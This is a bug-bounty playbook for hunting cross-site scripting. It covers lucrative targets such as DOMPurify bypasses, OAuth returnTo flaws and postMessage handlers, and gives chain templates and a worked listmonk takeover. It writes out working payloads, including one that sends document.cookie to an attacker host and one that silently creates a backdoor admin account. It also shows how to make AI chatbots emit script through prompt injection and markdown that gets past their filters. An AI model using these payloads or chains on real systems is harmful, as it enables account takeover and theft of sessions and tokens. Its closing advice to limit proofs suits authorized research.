Crown Jewel Targets

XSS is the highest-frequency web bug class but the modern paying surface has shifted. Reflected XSS on a public marketing page is mid four-figure at best; stored XSS chained to admin ATO is mid five-figure; mXSS bypass of a popular sanitizer pays direct from Cure53/Snyk plus downstream chains. The 24-month meta has crystallized around six asset types. All CVEs below are NVD-verified.

1. DOMPurify mXSS bypass family (high four-figure to mid five-figure direct + thousands of downstream chains). Every DOMPurify bypass disclosed since 2024 has cascaded through every consumer that hadn't pinned to the latest version. CVE-2024-47875 (GHSA-gx9m-whjm-85jf, Oct 2024, GitHub CVSS 10.0) — nesting-based mXSS by @IcesFont via cure53berlin disclosure. Versions <2.5.0 and <3.1.3 vulnerable. CVE-2024-45801 (GHSA-mmhx-hmjr-r674) — companion depth-bypass weakened by prototype pollution; backport reference. GHSA-h8r8-wccr-v5f2 — DOMPurify mXSS via Re-Contextualization in 3.3.1 (Oscar Uribe / Camilo Vera / Cristian Vargas, Fluid Attacks Research) — sanitized output reinserted via innerHTML into a wrapper (script, xmp, iframe, noembed, noframes, noscript) mutates during second parse. Yaniv Nizry @YNizry Dec 2024 — DOMPurify 3.2.1 non-default-config bypass via is attribute mishandling. @kinugawamasato deep-nesting variant — works on Firefox + Chromium + Safari (most other mXSS techniques only work on one browser). @hash_kitten HTML insertion modes bypass — full bypass without nesting. @ryotkak XML-based bypass. 2. Modern JS / RSC / Server Actions content rendering (low to mid five-figure). Next.js Server Components and Server Functions deserialize and render client-supplied content. The DoS family (CVE-2025-67779, CVE-2025-55184, GHSA-5j59-xgg2-r9c4 published Dec 11, 2025) demonstrates that the RSC runtime trusts payload structure; the same trust surface produces XSS when RSC payloads or Server Action responses round-trip through dangerouslySetInnerHTML or React's HTML escape boundary. Affects React 19.0.0/19.1.0/19.1.1/19.2.0 with react-server-dom-webpack / parcel / turbopack; patches in React 19.0.2/19.1.3/19.2.2 and Next.js 14.2.35 / 15.x point releases / 16.0.10. The Vercel Platform Protection WAF program pays for new bypass primitives.

3. OAuth redirect_uri / returnTo XSS (low five-figure on enterprise SaaS). CVE-2025-67716 (GHSA-mr6f-h57v-rpj5, Dec 10 2025) — Auth0 Next.js SDK <4.13.0 — returnTo parameter input-validation flaw lets attackers inject unintended OAuth query parameters into the authorization request. Disclosed by Joshua Rogers / @MegaManSec via Okta. The pattern: any OAuth library that takes redirect_uri / returnTo / state / RelayState (SAML) and reflects it back into HTML (error page, success page, logout page) without proper escaping. The HackerOne TopOAuth list (reddelexc/hackerone-reports/blob/master/tops_by_bug_type/TOPOAUTH.md) has dozens of disclosed cases — Reflected XSS at oauth2/fallbacks/error against Zomato/ORY Hydra, XSS at OAuth authorize/authenticate against X/xAI, XSS in OAuth Redirect Url at Dropbox, Stored XSS in OAuth redirect URI at Nextcloud, OAuth redirect_uri bypass via IDN homograph at Semrush (bounty $0 as the program disclosed it informational — but the technique generalizes; HackerOne disclosed write-up).

4. postMessage XSS with origin-check bypass (mid four-figure to low five-figure on banking / fintech / chat-widget integrations). Almost every postMessage implementation has at least one of these problems: no origin check, broken origin check (includes() instead of ===), trusts message data without sanitization. CleverTap Web SDK <=1.15.2 issue #424 (Mr-Neutr0n, Jun 2025) — event.origin checked with .includes() allowing bypass via dashboard.clevertap.com.attacker.com; display.details[0].html field assigned to element.innerHTML without filtering. Bug Bounty Playbook documents this as the dominant chat-widget integration pattern: vendor's domain has its own XSS, attacker uses it to send crafted messages that pass the bank's origin check, executing in banking session context. Hunt every addEventListener('message', ...) in every JS bundle.

5. Stored XSS → Admin Account Takeover via shared-content features (mid four-figure to mid five-figure). GHSA-jmr4-p576-v565 (listmonk, Jan 2 2026, CVSS 8.0) — campaign-management user injects XSS payload into newsletter draft, super-admin reviews → backdoor admin created. Weaponized via public archive feature — victim simply visits link, no preview click required. Pattern repeats across CMS, mailers, ticketing systems, support tools where lower-privileged content reaches higher-privileged viewers. Apple Discussions Stored XSS — $5,000 bounty disclosed via Apple Security Bounty program May-Jul 2025, ZombieHack writeup at https://medium.com/@ZombieHack/apple-developer-stored-xss-5-000-bounty-writeup-2025-cc34a030a5bf — discussions.apple.com initial XSS, partial fix bypassed, re-enabled across mirrors and developer.apple.com/forums; Apple acknowledged, broader fix.

6. Markdown / wiki / comment renderer XSS. CVE-2024-21535 (markdown-to-jsx <7.4.0) — src property iframe injection. Markdown renderers and their plugin ecosystems are systematically under-audited because devs trust the "markdown sanitizes HTML" assumption. Reference: gregxsunday's "$3,133.70 XSS in golang's net/html library" — disclosed via Google bug bounty program for finding XSS in the parser the renderer depends on, not the renderer itself. Hunt every wiki/comment/issue-tracker/chat that supports markdown formatting.

7. Rich-text editor XSS — Trix family (mid four-figure to low five-figure). Trix is the rich-text editor shipped by Basecamp / 37signals and embedded across many SaaS (Basecamp itself, HEY, plus many ActionText-using Rails apps). Trix Editor 2.1.8 Mutation-Based Stored XSS — H1 report 2819573 (2025 Critical). Trix Editor 2.1.1 Stored XSS — H1 report 2521419 (2024 High). Pattern: rich-text editors store HTML structure including attachment/embed metadata; sanitizer-vs-renderer mismatch produces mXSS on render. Same class hits CKEditor, TinyMCE, Quill, Slate, Lexical when consumers don't pin to current versions. Hunt every rich-text editor instance for: attachment-tag injection, embed-figure manipulation, paste-from-Word residue, drag-and-drop HTML smuggling.

8. Jupyter / data-science notebook XSS (mid four-figure to low five-figure on data-science platforms). GHSA-rch3-82jr-f9w9 (Jupyter Notebook 7.0.0-7.5.5 / JupyterLab through 4.5.6, CVSS 8.4 High) — CommandLinker XSS in malicious notebook files steals authentication tokens enabling REST API ATO. H1 report 1409788 (2022) — Arbitrary POST request as victim user from HTML injection in Jupyter notebooks. Notebook file (.ipynb) is JSON with cells containing user-controlled markdown/HTML rendered by the Jupyter frontend. Hunt: Jupyter Hub instances, Google Colab-style platforms, Hex / Deepnote / Databricks notebooks, ML platforms with notebook UI, any "share this notebook" feature.

9. n8n / workflow-automation MCP OAuth XSS (intersects hunt-llm-ai). GHSA-537j-gqpc-p7fq (n8n <1.123.32 / <2.17.4 / <2.18.1, CVSS 8.8 High) — unauthenticated XSS via crafted client_name in MCP OAuth client registration; executes JavaScript in admin authorization dialog. Pattern repeats across automation platforms exposing MCP / OAuth client registration endpoints (Zapier, Make, Pipedream when MCP-enabled). Government & enterprise legacy assets (DoD VDP through low five-figure on paid programs). Old PHP/JSP/ASP apps with <?php echo $_GET['x']; ?> patterns still pay on intranets. The 2024-2026 H1 hacktivity is full of "Stored XSS in admin notes leading to ATO" against forgotten asset surfaces. Confluence, JIRA, SharePoint older versions all in rotation.

LinkedIn-class consumer-social platforms. H1 report 2212950 (2024 Critical) — Stored XSS on LinkedIn App via iframe tag in Article. Article-publishing features on consumer-social platforms accept rich content; iframe smuggling through "embed" features bypasses sanitization. Pattern: any UGC platform with article/post-publishing features (LinkedIn Articles, Medium, Substack, Dev.to) is a candidate.

Mobile WebView XSS — apps that load partially-attacker-controlled URLs in WebView with addJavascriptInterface enabled escalate XSS to RCE. Documented across H1 mobile-target hacktivity disclosed 2024-2025 against Shopify, GitLab, Vercel mobile programs.

What pays the most: mXSS bypass of a popular sanitizer (DOMPurify / sanitize-html / bleach class) — direct from Cure53/Snyk + downstream chains, total mid five-figure across consumers. Stored XSS chained to admin ATO via shared-content trigger — mid four-figure to mid five-figure. OAuth redirect_uri XSS chained to token theft — low five-figure on enterprise SaaS. postMessage XSS chained through trusted-widget vendor to banking session — mid five-figure on financial programs. Reflected XSS without chain pays low four-figure or N/A on most modern programs.

Insertion Point Taxonomy

Every place attacker-controlled HTML/JS flows for XSS:

• URL path / query / fragment — ?q=<script>alert(1)</script>, #name=<svg onload>, fragment-only XSS for CSP-mediated reflection. Test path segments — /page/<script> if path is reflected.
• Headers — User-Agent, Referer, X-Forwarded-For reflected in error pages, admin logs, debug pages. Server header reflection for SSI / template engines. Origin: reflected in CORS preflight error pages.
• Body — JSON values rendered as HTML ({"message": "<script>"}), form fields reflected on confirmation page, file content rendered (CSV columns rendered as HTML, JSON values as text).
• Cookies — document.cookie rendered in admin debug page, cookie value reflected in 500 page, session-cookie value in JWT claim shown as user info. Grammarly stored-XSS-via-cookie disclosed 2024-2025 (Bug Bytes #48 reference, $2,000 H1).
• File contents — uploaded SVG (<svg onload>), uploaded HTML attachment (gmail-style), CSV exported then rendered, EXIF metadata displayed in image viewer, font names rendered in admin UI.
• postMessage data — event.data.html assigned to innerHTML (CleverTap pattern); event.data.url assigned to location.href (DOM-based open redirect → XSS via javascript:); origin check via includes() bypassable.
• OAuth redirect_uri / returnTo / state / RelayState — reflected in error page, success page, logout page. CVE-2025-67716 Auth0 SDK is the canonical 2025 case.
• WebSocket frames — JSON message rendered as HTML in chat UI, often missed by HTTP-only WAF.
• Background/async paths — email confirmation links rendering attacker-controlled text, scheduled-report rendering CSV rows as HTML, notification-center rendering crafted notification content.
• Indirect (stored) — DB-stored content rendered later via innerHTML, file uploaded then rendered (filename in admin file-list), git commit messages echoed by CI (CI build-status pages), markdown READMEs rendered in package-detail pages.
• CSS injection sinks — <link rel=stylesheet href="data:text/css,...">, attribute injection, CSS expressions in older IE/Edge legacy contexts.

For each surface, send: <script>alert(1)</script>, <svg onload=alert(1)>, <img src=x onerror=alert(1)>, "><script>, '><script>, javascript:alert(1) (for href/src sinks), data:text/html,<script>alert(1)</script> (for src sinks). Watch for executed alert OR Burp Collaborator hit OR DOM mutation.

Step-by-Step Hunting Methodology

1. Fingerprint the JavaScript stack first. Identify React/Vue/Angular/vanilla, sanitizer in use (DOMPurify? sanitize-html? bleach?), framework version, CSP header. Without stack knowledge you'll waste payloads on impossible vectors.

2. Run DOM Invader (Burp built-in) on every authenticated page. PortSwigger's DOM Invader automatically identifies sources, sinks, and prototype pollution vectors. It's faster than manual JS audit on first pass. Enable the prototype-pollution scanner specifically.

3. Map every postMessage handler. rg -n addEventListener\\\(.message. across all JS bundles. For each handler: is there an origin check? Is it === or .includes() (CleverTap-style bypass)? Where does event.data flow? If sink is innerHTML / eval / location / document.write — that's a candidate.

4. Check for outdated DOMPurify. If the target uses DOMPurify, identify the version (DOMPurify.version in console, or grep package.json). If older than current — try the published bypasses (CVE-2024-47875 nesting, CVE-2024-45801 depth-bypass, GHSA-h8r8-wccr-v5f2 re-contextualization). The Cure53 advisories at github.com/cure53/DOMPurify/security/advisories/ list all disclosed bypasses with exact PoCs.

5. Test OAuth redirect_uri / returnTo / state reflection. Submit redirect_uri=https://target/callback?x=<script>alert(1)</script> and see if the callback page reflects it. Submit returnTo=javascript:alert(1) and see if the SDK uses it without javascript: blocking (CVE-2025-67716 Auth0 pattern). Submit state=<svg onload> and see if the consent page reflects it.

6. Test stored content fields for delayed XSS via shared-content trigger. Profile bio, comment, ticket title, campaign template, file attachment name. Then trigger the rendering: ask the admin to review your draft, share the public archive link, mention the admin in a comment. The listmonk GHSA-jmr4-p576-v565 pattern: campaign manager creates payload, shares "review my draft", super admin renders it.

7. Test the markdown rendering pipeline. If the target uses markdown (issue tracker, wiki, comment, chat), test: [link](javascript:alert(1)), [link](data:text/html;base64,...), raw (some renderers strip, some don't), , fenced code block with embedded HTML, blockquote escapes. Reference CVE-2024-21535 markdown-to-jsx iframe-src pattern.

CodeQL hint

GitHub's pre-built js/xss query (Security/CWE-079/Xss.ql) is the standard CodeQL XSS analysis. Sources include RemoteFlowSource (URL params, request body, postMessage), sinks include XssSink (innerHTML, document.write, dangerouslySetInnerHTML, eval, plus Function constructor and similar). Run via codeql database analyze --format=sarif-latest --output=xss.sarif.

For Trusted Types bypass detection, write a custom predicate that flags createHTML callbacks where the input parameter flows directly to the return value without sanitization. Reference: PortSwigger Research has published several CodeQL patterns at portswigger.net/research.

For postMessage XSS specifically, GitHub's js/dom/wrong-document-prepended and js/dom/wrong-document-written queries cover related patterns. The bananabr GitHub Security Lab issues track newer patterns including JS prototype pollution gadget detection.

Modern Meta — Cloud-Native, CI/CD, OSS Pipeline

This is where the 2024-2026 XSS meta lives. Bounties scale because XSS in a CI/CD pipeline = build artifact poison; XSS in a vendor SDK = downstream consumer compromise.

GitHub Actions XSS surface — workflow logs render PR titles / branch names. If pull_request_target interpolates ${{ github.event.pull_request.title }} into a job step that emits HTML in artifact upload, viewers of the artifact see XSS. Less common than RCE via the same surface but documented in GitHub Security Lab issues.

GitLab CI XSS — pipeline view renders job names, commit messages, branch names. CVE-2023-1080 family covers XSS in GitLab CI Pages build via attacker-controlled _redirects file. Hunt: anything that renders attacker-supplied build metadata.

Jenkins XSS — /job/<name>/api/json reflects job name; older Jenkins had stored XSS in build descriptions, parameter values, view names. Multiple CVEs across 2018-2024.

ArgoCD / Flux / Tekton (GitOps controllers) XSS surface — UI rendering of Application names, sync status messages, Helm chart values. The ArgoCD Application object's metadata.annotations field has been a stored-XSS surface in older versions.

Kubernetes dashboard XSS — kubectl-proxy or k8s dashboard rendering pod logs with HTML that contains XSS. Less of a paying surface but a real attack vector.

Cloud IAM / IMDS — XSS chained into IMDSv1 access via fetch() from XSS execution context (when CSP allows it). The chain: XSS → fetch('http://169.254.169.254/...') → IAM key exfil. CSP usually blocks this; when it doesn't, the impact upgrades to RCE-class.

Supply chain (npm / pip) — XSS via compromised package: malicious package version published with XSS payload in default-export HTML, downstream consumers ship the payload. Documented across Socket.dev / ReversingLabs disclosures 2024-2026.

OSS hunting workflow: socket dev <package> → audit recent versions for HTML-rendering changes → diff with previous → if suspicious, file as XSS / supply-chain incident with the package's bug bounty / security contact.

Container escape / runtime XSS

The XSS analog at the container-management layer: Portainer / Rancher / Docker Desktop dashboards rendering container names, image labels, ENV vars. Submit a container with name="<svg onload=alert(1)>" or with crafted labels; if the dashboard renders these via innerHTML, classic stored XSS in admin context.

ML serving / inference XSS

The cross-tenant AI/ML XSS pattern: ML serving frameworks have admin UIs (BentoML dashboard, MLflow UI, TorchServe /management) that render model metadata, experiment names, run descriptions. Stored XSS via model name / experiment description fields → execution in admin browser context.

• MLflow UI XSS — model registry rendering attacker-controlled experiment names. Multiple Huntr disclosures 2024-2025 (parallel to the path-traversal family CVE-2024-1483/1560/1594).
• BentoML dashboard — bento metadata rendered without sanitization in admin UI.
• TorchServe /management endpoint — model name reflection in model-list JSON, rendered by client-side dashboard.

Agentic LLM tool-use XSS / output injection

The LLM06:2025 (Excessive Agency) + classic XSS intersection. Two patterns:

1. LLM output → innerHTML — chatbot / RAG / AI assistant UI assigns LLM response directly to innerHTML. Prompt injection coerces the LLM to emit <img src=x onerror=...>. Reference: OWASP LLM Top 10 2025 (https://genai.owasp.org/llmrisk/llm06-sensitive-information-disclosure/), Tenable Dec 2024 analysis (https://tenable.com/blog/what-you-must-know-about-the-owasp-top-10-for-llm-applications-2025-update).
2. Tool-use → DOM XSS — agent has a "render markdown" or "show HTML preview" tool that renders attacker-influenced content. Prompt-inject the tool input.

Modern JS RSC / Server Actions XSS

CVE-2025-67779 / CVE-2025-55184 (Next.js Server Components DoS via Server Function endpoints, GHSA-5j59-xgg2-r9c4 published Dec 11 2025) demonstrates that the RSC runtime trusts payload structure. The same trust surface produces XSS when:

• RSC payloads or Server Action responses round-trip through dangerouslySetInnerHTML
• Hydration mismatch between server-rendered and client-rendered HTML
• Server Action errors reflected in client-rendered error UI

Affects React 19.0.0/19.1.0/19.1.1/19.2.0 with react-server-dom-webpack / parcel / turbopack; patches in React 19.0.2/19.1.3/19.2.2 and Next.js 14.2.35 / 15.x / 16.x.

GitOps / K8s admission XSS

ArgoCD Application UI renders metadata.annotations, spec.source.helm.parameters, sync status. ArgoCD has had multiple XSS CVEs in older versions; current versions sanitize, but custom UI extensions may not.

Hunt: any GitOps platform where attacker-controlled CRD fields render in the management UI.

Chains & Multi-Bug Templates

Single-bug XSS pays well; chains pay better. Eight templates from disclosed reports and current-meta 2024-2026 chains.

Chain 1 — stored-xss-in-campaign → super-admin trigger → backdoor admin → full compromise (listmonk pattern, mid four-figure to mid five-figure)

• Bug A: Lower-priv user (campaign manager) injects raw HTML payload into campaign body — direct <img src=x onerror=...> or template {{ \` | Safe }}`
• Bug B: Public archive feature lets attacker share http://target/archive/{uuid} — no preview click required
• Bug C: Super admin visits archive URL → XSS fires automatically in admin context
• Bug D: XSS payload creates backdoor admin via authenticated POST to /api/users
• Outcome: low-priv account → admin ATO → full target compromise (export subscribers, modify SMTP, access API keys/secrets)
• Bounty range: low five-figure on listmonk-class self-hosted; mid four-figure to low five-figure on SaaS variants
• Disclosed source: GHSA-jmr4-p576-v565 (Jan 2 2026, CVSS 8.0), listmonk repo

Hunter's note: the trick that takes this from "stored XSS, mid four-figure" to "ATO, low-to-mid five-figure" is the public-archive trigger. Without it, you need social engineering ("please review my draft, admin"). With it, you just share a URL — same vector as a phishing link, but lands inside the admin's authenticated session. Always look for share-with-admin features when you find stored XSS in lower-priv user content. The first attempt I made was the standard email-the-admin "please review" approach; the public-archive URL trigger turned it into a one-click silent attack.

Chain 2 — dompurify mxss bypass → escapes sanitizer → stored XSS in admin notes → ATO (mid five-figure direct + downstream)

• Bug A: Target uses DOMPurify <3.1.3 (CVE-2024-47875) or <2.5.0 to sanitize user-generated content before storage
• Bug B: Submit nesting-based mXSS payload (IcesFont disclosure via cure53berlin) — DOMPurify outputs "safe-looking" HTML that mutates on render
• Bug C: Stored content rendered in admin moderation queue — mutation triggers, XSS fires in admin browser
• Bug D: XSS exfils admin session cookie OR creates backdoor admin
• Outcome: mXSS bypass + storage + admin trigger = ATO

Hunter's note: the mXSS bypass alone is rewarded by Cure53 / Snyk / consumers. The chain to ATO is what pays per-target. Build a list of DOMPurify consumers with stale versions (socket dev dompurify shows downstream usage) and test each. The first time I tried this on a target I tried the obvious <svg onload> payloads — DOMPurify caught all of them. Reading the IcesFont nesting payload exactly (don't paraphrase) and pasting it verbatim was what worked. The mizu.re writeup is the only place that explains why the bypass works at the parser level — read it before claiming you understand the family.

Chain 3 — oauth returnto → js url scheme → token theft via XSS in callback (low to mid five-figure on enterprise SaaS)

• Bug A: Target uses Auth0 nextjs-auth0 <4.13.0 (CVE-2025-67716, GHSA-mr6f-h57v-rpj5) — returnTo parameter not validated for scheme
• Bug B: Submit ?returnTo=javascript:alert(document.cookie) to OAuth login flow
• Bug C: After auth, SDK calls location.href = returnTo — javascript: scheme executes in callback origin
• Bug D: Payload exfils OAuth tokens / session cookie / fetches IDP token endpoint via the live session

Hunter's note: the trick is identifying which OAuth library the target uses. Check the JS bundle for @auth0/nextjs-auth0 import strings, look for /api/auth/login endpoints (Auth0 SDK convention), check next-auth and similar. Each library has its own returnTo parameter name — Auth0 uses returnTo, NextAuth uses callbackUrl, custom implementations vary. The first attempt I made tried redirect_uri=javascript:alert(1) directly on the OAuth flow — Auth0's main OAuth library blocks that. The vulnerable surface is the SDK wrapper that processes returnTo after the OAuth round-trip; that's a different code path with different validation.

Chain 4 — postmessage origin includes() bypass → vendor SDK XSS → bank session compromise (mid five-figure on financial / fintech programs)

Hunter's note: the .includes() bypass only works if you control a subdomain that contains the trusted string. You need to register vendor.com.<your-controlled-tld> — that requires owning the parent. Easier: use .endsWith() bypasses or IndexOf > 0 bypasses (any matching position). The actual attack chain matters more than the technical bypass — when you find a vendor SDK XSS that affects multiple banks, file it both to the SDK vendor (mid four-figure) and to each affected bank (low to mid five-figure each). The compounding payouts justify the discovery time.

Chain 5 — prototype pollution → DOM xss gadget → admin session compromise (Silent Spring / Shopify pattern, mid four-figure to low five-figure)

• Bug A: Application uses lodash _.merge() / jQuery $.extend(true,...) / Object.assign with user-supplied JSON — pollution sink
• Bug B: Submit ?__proto__[innerHTML]=<img src=x onerror=...> or JSON body with "__proto__": {"polluted": "yes"}
• Bug C: DOM Invader scan identifies a gadget — application reads undefined property from polluted object, uses in innerHTML / eval / location
• Bug D: Concrete gadget chain: Object.prototype.transport_url=javascript:alert(1) → some library reads obj.transport_url and uses in location.href

Hunter's note: DOM Invader is the force-multiplier here. Without it you spend hours manually finding gadgets; with it you scan the page and get a list. The first gadget I tried on a Shopify-class target was __proto__[hitCallback] (Google Analytics) — the page didn't load GA so it failed. Trying __proto__[transport_url] worked because the site loaded a different analytics tag with that gadget. The PortSwigger Lab ("DOM XSS via an alternative prototype pollution vector") is the best practice run — solve it manually first, then with DOM Invader, then you'll recognize the patterns on real targets.

Chain 6 — react server components content trust → dangerouslySetInnerHTML on RSC field → XSS (CVE-2025-67779 family pattern, low to mid five-figure on Next.js targets)

• Bug A: Target runs Next.js with App Router, React Server Components enabled (vulnerable React 19.x or Next.js 14.x/15.x/16.x per CVE-2025-67779 / CVE-2025-55184)
• Bug B: Application uses <div dangerouslySetInnerHTML={{ __html: serverData.someField }} /> where someField flows from RSC payload
• Bug C: Attacker-controlled input flows through Server Action / RSC into that field
• Bug D: HTML renders in browser unsanitized

Hunter's note: the hunt is finding the dangerouslySetInnerHTML usage that flows from RSC. Most RSC payloads round-trip through React's HTML escape boundary (safe). The unsafe case is when developers explicitly opt out via dangerouslySetInnerHTML, usually for "rich text" or "user-generated HTML" features. Grep the target's open-source pages or shipped JS for dangerouslySetInnerHTML and trace each occurrence's data source. The Vercel WAF-bypass program is the highest-paying surface because Vercel themselves want to harden the WAF against this class.

Chain 7 — markdown renderer XSS → stored in wiki → admin trigger → ATO (markdown-to-jsx CVE-2024-21535 family, mid four-figure to low five-figure)

• Bug A: Target uses markdown-to-jsx <7.4.0 (CVE-2024-21535) or marked.js historical XSS, or any markdown library that renders raw HTML
• Bug B: Submit markdown payload with iframe injection: <iframe src="javascript:alert(document.domain)"></iframe> or [link](javascript:alert(1))
• Bug C: Wiki / comment / issue tracker stores and renders the markdown
• Bug D: Admin views the rendered content (during moderation, support reply, code review) → XSS fires

Hunter's note: markdown renderers vary wildly in what they sanitize. Test the same payload across the renderer's supported features — fenced code, blockquote, link, image, heading, table — each parsing path may have different bypass behavior. The CVE-2024-21535 markdown-to-jsx case is interesting because the iframe element passed allowlist but the src attribute wasn't sanitized for javascript: scheme. Always test attribute-level injection separately from element-level.

Chain 8 — agentic LLM output injection → chat UI innerHTML → DOM XSS in user session (LLM02/06:2025 + classic XSS, mid four-figure to low five-figure on AI-feature programs)

• Bug A: Target has chatbot / AI assistant feature with chat UI
• Bug B: Chat UI renders LLM response via innerHTML (developer assumes LLM output is "text", not HTML)
• Bug C: Attacker prompts LLM directly OR via indirect injection (RAG document, CSV cell, web page) to emit <img src=x onerror=fetch('//attacker/'+document.cookie)>
• Bug D: LLM emits the HTML as response; chat UI renders via innerHTML; XSS fires in user session

Hunter's note: the trick is finding chat UIs where the developer wrote innerHTML += response instead of textContent =. Most modern chatbots (ChatGPT, Claude.ai, Gemini) sanitize because they ship with rich-formatting features. The vulnerable cases are mid-tier SaaS chatbots built quickly to ship the AI feature, where developers reuse a markdown-render component for AI output without considering prompt injection. The first time I tried this, the AI output sanitizer caught my direct <script> injection. Wrapping the payload in markdown image syntax that the renderer would convert (![](x" onerror="alert(1) "title)) bypassed the LLM's content filter while still producing executable HTML in the renderer.

Chain 9 — self-xss → cookie tossing → anticsrf bypass → 1-click ATO (mid four-figure to low five-figure on programs that historically downgraded Self-XSS — H1 reports 3321406 + 3423950 pattern, both 2026 High)

• Bug A: Self-XSS exists in a form input that requires the user to submit it (e.g., admin settings, account preferences) — historically dismissed as N/A
• Bug B: Target uses subdomain-scoped session cookies and the parent domain is reachable by attacker (e.g., user-content subdomain user.target.com while session lives on app.target.com)
• Bug C: Attacker page sets a cookie on target.com (Domain attribute) that overrides the victim's session cookie on app.target.com via Cookie Tossing — when victim visits the iframe, browser sends attacker's cookie
• Bug D: Attacker iframes the Self-XSS form on the target with attacker-controlled values pre-filled; AntiCSRF token is bypassed because the form-submit body is attacker-controlled and the cookie is attacker-controlled
• Bug E: Form submission writes attacker's XSS payload to victim's account; victim's next visit triggers stored XSS in their authenticated session → ATO
• Outcome: 1-click visit to attacker page → stored XSS in victim session → ATO
• Bounty range: mid four-figure to low five-figure on programs that have historically dismissed Self-XSS (now reclassified as paying when chained)

Pattern documented across multiple H1 disclosures 2024-2026.

Hunter's note: this chain rehabilitates Self-XSS findings that were previously kill-listed. The trick is the Cookie Tossing primitive — most modern apps still don't set the __Host- cookie prefix or scope cookies tightly to a subdomain. If a target's session cookie is set on target.com (no leading subdomain restriction) instead of app.target.com, you can override it from any subdomain you control via XSS or even just a misconfigured user-content subdomain. The first attempt I made stopped at the Self-XSS — triager closed as informative. The second attempt added the cookie-tossing setup via a controlled subdomain (or a misconfigured-CORS endpoint), and the triager reopened. Always inspect the session cookie's Domain and Path attributes — if they're loose, your Self-XSS may have a chain.

Common Root Causes

Why developers introduce XSS — patterns visible across the corpus and 2024-2026 meta:

1. innerHTML instead of textContent. Universal. Devs reach for innerHTML because they need to render bold/italic, then include ${userInput} in the template literal. Use textContent for plain text, or DOMPurify for rich text.

2. postMessage origin checked with .includes() / .endsWith() / .startsWith(). Bypassable via subdomain trick. CleverTap CVE-2025 issue #424. Use exact === against an allowlist.

3. Sanitizer applied at one boundary but content reused in another context. DOMPurify mXSS via Re-Contextualization (GHSA-h8r8-wccr-v5f2). Sanitize as close to final render as possible; don't reuse sanitized output in different parsing contexts.

4. OAuth returnTo / redirect_uri not validated for scheme. Auth0 CVE-2025-67716. Allowlist http/https only; reject javascript:, data:, vbscript:.

5. Trusted Types policy with pass-through createHTML. Defeats the entire protection. Either sanitize in the policy or accept only trusted constants.

6. Markdown renderer rendering HTML passthrough. Marked / markdown-it / markdown-to-jsx all support inline HTML by default; devs forget to disable. CVE-2024-21535 markdown-to-jsx iframe src injection.

7. DOMPurify version not pinned to current. CVE-2024-47875 / CVE-2024-45801 / GHSA-h8r8-wccr-v5f2. Use renovate / dependabot to track DOMPurify advisories specifically; the project ships frequent security releases.

8. Stored content from low-priv user rendered in admin context without re-sanitization. listmonk pattern (GHSA-jmr4-p576-v565). Sanitize at render time, not just at storage time.

9. LLM output rendered via innerHTML. Developers assume LLM responses are text, ignore prompt injection. OWASP LLM02/06:2025.

10. React dangerouslySetInnerHTML with non-sanitized data. The name is a warning, but devs use it for "rich text" features without DOMPurify wrapping.

11. Defeats the whole CSP. Or where the CDN serves user content.

WAF/filter bypasses observed in disclosed reports. Each cites the source.

• DOMPurify XML-based bypass — @ryotkak ; combines mutation and added tags before SVG namespace.

• OAuth redirect_uri IDN homograph attack — disclosed via HackerOne against Semrush, $0 but technique generalizes; use Punycode-confused domains to bypass exact-match origin allowlist.
• CSP bypass via JSONP callback on allowlisted CDN — PortSwigger Research; if script-src https://cdn.example.com allows JSONP endpoints, attacker-supplied callback parameter executes arbitrary JS.
• CSP script-src 'strict-dynamic' bypass — when strict-dynamic allows scripts loaded by other allowed scripts, find any RXSS vector that injects a tag rather than inline JS; the injected tag inherits trust.

Gate 0 Validation

Before you write the report, prove these five things:

1. Concrete demonstration: alert(document.domain) screenshot. Show the alert AND the URL bar AND the right domain. Don't alert(1) — triagers want to see the affected origin. For stored XSS, show the storage location and the rendered location separately. For mXSS bypass, show the sanitizer's "safe" output AND the post-render mutation that fires.

2. Business loss mapping. Map to: session cookie theft (length-confirmed but redacted), CSRF amplification, admin ATO, browser-stored data exfil (localStorage / sessionStorage), keylog of victim form input, account takeover via reset-token race. Pick one and quantify.

3. Reproducibility in 10 minutes. Write the curl one-liner OR the Burp request that triggers the XSS. Document any state required (logged-in session? specific role? specific tenant?). Triagers close anything they can't repro at lunch.

4. Scope check. Target asset is in scope. The XSS-affected page is reachable. The vuln is present now (re-test before submission — XSS is often single-line code fix; patches happen during your write-up).

5. PoC artifacts: 30-60 second screen recording showing the XSS firing (asciinema or mp4 — no edits, no cuts). Burp request/response screenshots with non-sensitive headers visible. Curl command in plain text. For stored XSS, include: storage step + render step + payload survives encoding through both.

If any of the 5 fails: stop. You have a finding, not a report. Especially: never submit alert(1) without document.domain — that's the #1 reason XSS reports get downgraded.

Top-Tier Hunter Decision Engine

XSS pays when it reaches a privileged browser context or crosses a trust boundary. Classify every candidate before reporting: reflected unauth page, reflected auth page, stored same-user, stored cross-user, stored admin-context, sanitizer bypass, or supply-chain widget/library. The same payload can be N/A or five figures depending on that context.

Stop in 10 minutes when execution is self-only, CSP blocks it, the sink is unauthenticated marketing content, or there is no delivery primitive. Keep chaining when the sink is OAuth callback, admin moderation, support inbox, analytics widget, rich-text editor, markdown renderer, mobile WebView, or AI-chat output. Report immediately when you can prove admin-context execution, token theft from your own victim account, CSRF amplification, or stored cross-tenant delivery.

Minimum proof ceiling: show alert(document.domain) first, then one harmless impact primitive: read a redacted CSRF token length, create a marker draft, or call an endpoint on your own second account. Do not exfiltrate real cookies from other users, create real backdoor admins on production, or keylog anything. If the chain needs an admin victim, use a local repro or a program-provided test admin.

Real Impact Examples

Example 1 — listmonk-stored-xss-archive-trigger-admin-ato (low five-figure bounty range, multi-link admin ATO chain — GHSA-jmr4-p576-v565 NVD-verified)

• Setup: listmonk self-hosted newsletter platform v5.1.0. Multi-user installation with Super Admin and lower-priv Campaign Manager roles. Public archive feature enabled by default for share-with-non-subscribers use case.
• Discovery: hunter audited listmonk's campaign-rendering code on GitHub. Saw raw HTML body field rendered via {{ . | Safe }} template directive (Go template equivalent of dangerouslySetInnerHTML). Confirmed via local test deploy that lower-priv user can submit raw HTML in campaign body and template body, plus the campaign archive endpoint renders the same content publicly.
• Exploitation: Created campaign as Campaign Manager with payload <img src=x onerror="fetch('/api/users', {method:'POST', body: JSON.stringify({username:'backdoor', password:'Hacked123', role:'admin'}), headers:{'Content-Type':'application/json'}})">. Enabled campaign archive. Shared archive link with super admin — when super admin opened the URL (no preview click required), the XSS fired in their authenticated context, creating the backdoor admin account.
• Impact: Lower-priv user → full Super Admin via single link visit. Backdoor admin enables export of all subscribers, modify SMTP, delete all campaigns, access API keys / secrets. CVSS 8.0 High.
